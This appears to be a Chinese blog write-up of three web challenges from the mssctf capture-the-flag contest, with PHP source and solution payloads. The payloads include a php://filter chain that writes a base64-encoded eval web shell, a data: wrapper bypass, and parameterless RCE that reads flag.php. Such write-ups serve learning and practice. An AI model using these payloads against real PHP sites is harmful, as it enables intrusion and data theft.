2. 程式人生 > 其它 >Mssctf WEB wp

Mssctf WEB wp

阿新 發佈:2021-07-13

include

原始碼

<?php
error_reporting(0);
$a=$_GET['a'];
$b=$_GET['b'];
$c=$_POST['c'];
if(!isset($b)){
    highlight_file(__FILE__);
}
function check_out($x){
    str_replace("data","???",$x);
    str_replace("zip","???",$x);
    str_replace("zlib","???",$x);
    str_replace("file","???",$x);
    str_replace("rot13","???",$x);
}
if($array[++$a]=1){
    if($array[]=1){
        echo "Come on!";
    }else{
        echo "Good,you have already solve the first problem";
        check_out($b);
        file_put_contents($b,"<?php die('Victory is in sight');?>".$c);
    }* 
}
?>
  • 第一層繞過 陣列溢位繞過 由於自增

payload:a=9223372036854775806

  • 第二層繞過 filter協議 寫檔案 由於程式碼處有php標籤 所以要先去除

payload:b=php://filter/write=string.strip_tags|convert.base64-decode/resource=b.php

  • 第三層 base64編碼寫入

c=PD9waHAgZXZhbCgkX0dFVFsxXSk7Pz4=

Hs.com

抓包看到提示 Allowed-Request-Method: HS

用HS方法訪問看到原始碼

 <?php error_reporting(0); $fake_data = $_GET['innerspace']; $data = $_REQUEST['innerspace']; if ($_SERVER['REQUEST_METHOD'] === "HS") {   if (isset($data)) {     if ($data === "mssctf" && $data !== $fake_data) {       include_once "flag.php";       echo $flag;     } else {       echo "My house is pretty big.";     }   } else {     highlight_file("index.php");   } } else {   header('HTTP/1.1 405 Something Goes Wrong');   header('Allowed-Request-Method: HS'); }

可以看到$_GET['innerspace']和$_REQUEST['innerspace']

if條件$data=mssctf&data!$fake_data即可

直接將GET方法改為HS 方法後 傳入cookie:innerspace=mssctf

$fake_data值為空

$data值為mssctf

即可出flag

baby php

遠古考點

<?php
error_reporting(0);
highlight_file(__FILE__);

$mss1 = $_POST['level1'];
$mss2 = $_POST['level2'];
$mss3 = $_POST['level3'];

if (intval($mss1) < 2021 && intval($mss1 + 2) > 2022) {

    $mss4 = file_get_contents($mss2,'r');
    if ($mss4 === "mssCTF is interesting!") {
        
        if (!preg_match("/[0-9]|\`|\^|\\$|\*|\%|\~|\+|\{|\}|\'|\\\"|\,|\<|\>|\.|\/|\?/i", $mss3)) {
            echo "Regex is so wonderful!";
            echo "<br/>";
            eval($mss3);
        }

        else {
            echo "Success is near!";
            echo "<br/>";
        }
    }

    else {
        echo "Do you like PHP?";
        echo "<br/>";
    }
}

else {
    echo "Level1 is a babe trick,try again!";
    echo "<br/>";
}
  • intval()科學計數法繞過

payload:level1=1e10

  • file_get_contents()繞過

用data協議繞過

payload:level2=data:,mssCTF%20is%20interesting!

  • 第三個考查無引數rce

payload: 先用var_dump(scandir(current(localeconv())));檢視flag在第幾個

隨後readfile(next(array_reverse(scandir(current(localeconv())))));進行檢視flag.php

相關推薦

Mssctf WEB wp

include 原始碼 <?php error_reporting(0); $a=$_GET[\'a\']; $b=$_GET[\'b\']; $c=$_POST[\'c\']; if(!isset($b)){

Bugku--web-wp

Bugku地址:https://ctf.bugku.com/challenges 0x01 web2 地址:http://123.206.87.240:8002/web2/ ,檢視原始碼

hgame-week1-web-wp

hgame第一週總結 寫好了一直沒發qwq(就是懶(bushi) 一、Tetris plus! 題目裡說玩到3000分就給flag,還真有點點難度,手機玩到3000跳出來flag被隱藏了,於是又用電腦玩(這裡經歷了重重磨難,首先手機上用了3部手機

hgame-week3-web-wp

hgame第三週(web ak) 1.SecurityCenter 先看看hint(**vendor是第三方庫和外掛放置的資料夾,一般來源於composer的安裝)

XCTF WEB 進階區 001-004 WP

XCTF WEB 進階區 001-004 WP 001.baby_web 開啟主頁index.php,會自動跳轉回1.php直接抓包獲得flag

2019國賽線上賽兩道webwp

justsoso 這是第一天的第一道web題,右鍵看原始碼出現如下提示 易知是檔案包含,然後直接偽協議得到原始碼:

CTF webwp

1.簽到題 火狐F12檢視原始碼,發現註釋:一次base64解碼出flag 2.Encode 在這裡插入圖片描述

成理信安協會第一屆信安大挑戰WEB題千反田很好奇WP

就是試了個小壞嘛,不要打我 Step1 開啟題目,映入眼簾的是這個: 肯定知道題目是被藏起來了,所以正常情況下就開始翻cookie啦,用burp抓啦,之類的。但是我在index.php裡設定了302跳轉,跳轉去了start.php,你怎

CTF-Web-NSCTF-解密WP

CTF-Web-NSCTF-解密WP 題目連結-攻防世界-web2 知識考察:PHP程式碼審計、逆向加解密

【CTFshow】Web入門-php特性(89-101) wp

前言 感覺瞭解php特性是基礎,所以決定先做這部分。 Web89(preg_match和intval) 兩步,繞過正則,intval不為0。採取傳入陣列的方式繞過:

如何通過配置檔案安裝web專案到iPhone上

今天給大家介紹一下東西,叫做Web Clip,效果如下圖。 其實就是類似一個我們在Safari中,將網頁儲存到桌面是一個意思,但是可能使用者不懂怎麼去操作。那麼今天我們就可以通過Web Clip配置一個.mobileconfig檔案,

Flutter web 環境配置&專案建立

話不多說,flutter 支援web已經有一段時間了。最近因為單位有web需求,本身我是做iOS的,對web的熟悉程度還不及Flutter,並且單位的需求,不一定會用在生產環境之中,遂決定採用還在beta中的flutter web進行開發。

[springboot 開發單體web shop] 4. Swagger生成Javadoc

Swagger生成JavaDoc 在日常的工作中,特別是現在前後端分離模式之下,介面的提供造成了我們前後端開發人員的溝通成本大量提升,因為溝通不到位,不及時而造成的[撕幣]事件都成了日常工作。特別是很多的開發人員不擅

web爬蟲系列(一)- 爬取電影天堂迅雷地址

一、爬蟲介紹 目前爬蟲框架層出不窮,當然很多公司也會根據自己的業務做二次開發,Java的有WebMagic和WebCollector等,Python的有PySpider和Scrapy等。不能說孰好孰壞,只能說根據自己的業務場景選擇不同框架,Pytho

基於JWT(JSON Web Token)的token身份驗證

相逢便是緣,路過點個贊 ^.^ 原始碼:https://github.com/yulc-coding/java-note/tree/master/jwt

IDEA啟動匯入的web專案

1.前言 使用idea從版本控制系統中匯入專案或直接匯入新專案後,我們使用idea啟動該專案需要做的一些操作,非maven專案;

[springboot 開發單體web shop] 8. 商品詳情&評價展示

上文回顧 上節 我們實現了根據搜尋關鍵詞查詢商品列表和根據商品分類查詢,並且使用到了mybatis-pagehelper外掛,講解了如何使用外掛來幫助我們快速實現分頁資料查詢。本文我們將繼續開發商品詳情頁面和商品留言功能

SpringBoot系列教程web篇Servlet 註冊的四種姿勢

原文: 191122-SpringBoot系列教程web篇Servlet 註冊的四種姿勢 前面介紹了 java web 三要素中 filter 的使用指南與常見的易錯事項,接下來我們來看一下 Servlet 的使用姿勢,本篇主要帶來在 SpringBoot 環境下,註

[springboot 開發單體web shop] 7. 多種形式提供商品列表

上文回顧 上節 我們實現了仿jd的輪播廣告以及商品分類的功能,並且講解了不同的注入方式,本節我們將繼續實現我們的電商主業務,商品資訊的展示。

Spring boot+Mysql+Spring data JPA一個Web的Demo

1.概述 因為要用spring boot,最近剛剛學習.這是一個web專案的配合mysq+Hibernate+tomcat的簡單示例demo,很容易在此基礎上擴充套件成自己的專案.